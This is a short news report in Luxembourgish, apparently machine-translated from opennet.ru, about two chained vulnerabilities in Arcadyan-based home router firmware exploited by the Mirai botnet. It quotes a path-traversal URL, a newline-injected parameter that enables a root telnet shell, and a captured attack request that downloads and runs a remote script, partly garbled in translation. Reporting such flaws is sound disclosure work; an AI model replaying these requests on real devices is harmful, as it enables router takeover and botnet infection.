Schwachstelle bei Heemrouter déi 17 Hiersteller beaflossen

E massive Attack gouf am Netz géint Heemrouter opgeholl, deenen hir Firmware eng HTTP-Serverimplementatioun vun der Arcadyan Firma benotzt. Fir d'Kontroll iwwer Geräter ze kréien, gëtt eng Kombinatioun vun zwou Schwachstelle benotzt, déi d'Remote Ausféierung vun arbiträrem Code mat Rootrechter erlaabt. De Problem beaflosst eng zimlech breet Palette vun ADSL Router vun Arcadyan, ASUS a Buffalo, souwéi Geräter, déi ënner de Beeline Marken geliwwert ginn (de Problem gëtt am Smart Box Flash bestätegt), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone an aner Telekomoperateuren. Et gëtt bemierkt datt de Problem an der Arcadyan Firmware fir méi wéi 10 Joer präsent ass a während dëser Zäit et fäerdeg bruecht huet op d'mannst 20 Apparatmodeller vu 17 verschiddene Hiersteller ze migréieren.

Déi éischt Schwachstelle, CVE-2021-20090, mécht et méiglech Zougang zu all Web Interface Skript ouni Authentifikatioun. D'Essenz vun der Schwachstelle ass datt an der Webinterface e puer Verzeichnisser, duerch déi Biller, CSS Dateien a JavaScript Scripte geschéckt ginn, zougänglech sinn ouni Authentifikatioun. An dësem Fall gi Verzeichnisser fir déi Zougang ouni Authentifikatioun erlaabt ass mat der initialer Mask gepréift. D'Spezifikatioun vun "../" Zeechen a Weeër fir an den Elterenverzeichnis ze goen ass vun der Firmware gespaart, awer d'Benotzung vun der Kombinatioun "..%2f" gëtt iwwersprangen. Sou ass et méiglech geschützte Säiten opzemaachen wann Dir Ufroe schéckt wéi "http://192.168.1.1/images/..%2findex.htm".

Déi zweet Schwachstelle, CVE-2021-20091, erlaabt e authentifizéierte Benotzer Ännerungen un de Systemastellungen vum Apparat ze maachen andeems se speziell formatéiert Parameteren op de Skript application_abstract.cgi schéckt, wat net iwwerpréift fir d'Präsenz vun engem Newline Charakter an de Parameteren . Zum Beispill, wann Dir eng Ping-Operatioun ausféiert, kann en Ugräifer de Wäert "192.168.1.2%0AARC_SYS_TelnetdEnable=1" am Feld spezifizéieren mat der IP Adress déi gepréift gëtt, an dem Skript, wann Dir d'Astellungsdatei erstellt /tmp/etc/config/ .glbcfg, wäert d'Linn "AARC_SYS_TelnetdEnable = 1" an et schreiwen ", déi den Telnetd-Server aktivéiert, deen onbeschränkten Kommandoshell-Zougang mat Rootrechter ubitt. Ähnlech, andeems Dir den AARC_SYS Parameter setzt, kënnt Dir all Code am System ausféieren. Déi éischt Schwachstelle mécht et méiglech e problematesche Skript ouni Authentifikatioun ze lafen andeems se als "/images/..%2fapply_abstract.cgi" zougräifen.

Fir Schwachstelle auszenotzen, muss en Ugräifer fäeg sinn eng Ufro un den Netzhafen ze schécken, op deem d'Webinterface leeft. Duerch d'Dynamik vun der Verbreedung vum Attack beurteelen, vill Betreiber verloossen Zougang op hiren Apparater vum externen Netz fir d'Diagnostik vu Probleemer vum Supportservice ze vereinfachen. Wann den Zougang zum Interface nëmmen op dat internt Netzwierk limitéiert ass, kann en Attack vun engem externen Netzwierk mat der Technik "DNS Rebinding" duerchgefouert ginn. Schwachstelle gi schonn aktiv benotzt fir Router mam Mirai Botnet ze verbannen: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: Close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: opennet.ru

Setzt e Commentaire